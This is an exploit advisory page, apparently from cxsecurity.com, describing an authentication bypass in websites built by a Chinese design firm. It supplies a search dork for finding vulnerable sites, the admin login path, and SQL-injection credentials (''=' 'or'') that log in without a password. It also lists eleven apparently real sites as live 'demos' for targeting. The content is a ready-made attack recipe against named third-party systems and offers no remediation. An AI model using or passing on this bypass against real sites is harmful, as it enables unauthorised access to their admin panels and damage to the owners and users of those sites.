Foshan Nanhai Dachang shelf Co. bypass adminpage Vulnerability

2016.10.29
ir Ashiyane Digital Security Team (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"网站设计:火龙科技"

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------In The Name Of God------------------------| |[+] Exploit Title: Foshan Nanhai Dachang shelf Co. bypass adminpage Vulnerability |[+] Exploit Author: Ashiyane Digital Security Team |[+] Vendor Homepage: http://www.hotlon.com/ |[+] Google Dork : intext:"网站设计:火龙科技" |[+] Tested on: Windows 10 && Google Chrome && Mozilla Firefox |[+] Date: 2016 29 October |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Then Choose a Target and put this after URL : /maintain/login.php |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] And fill username and password like the information below : |[+] Username : '=' 'or' |[+] Password : '=' 'or' |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Demos : |[+] http://www.blueambre.com/maintain/login.php |[+] http://www.dcshelf.com/maintain/login.php |[+] http://www.pwceramic.com/maintain/login.php |[+] http://www.diamond.cn/maintain/login.php |[+] http://www.chuangyizhongxin.org/maintain/login.php |[+] http://www.china-yuxi.cn/maintain/login.php |[+] http://www.wldmart.com/maintain/login.php |[+] http://www.gdjuying.com/maintain/login.php |[+] http://www.chuangyizhongxin.org/maintain/login.php |[+] http://www.ccjjt.cn/maintain/login.php |[+] http://www.cimcpark.com/maintain/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : modiret |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top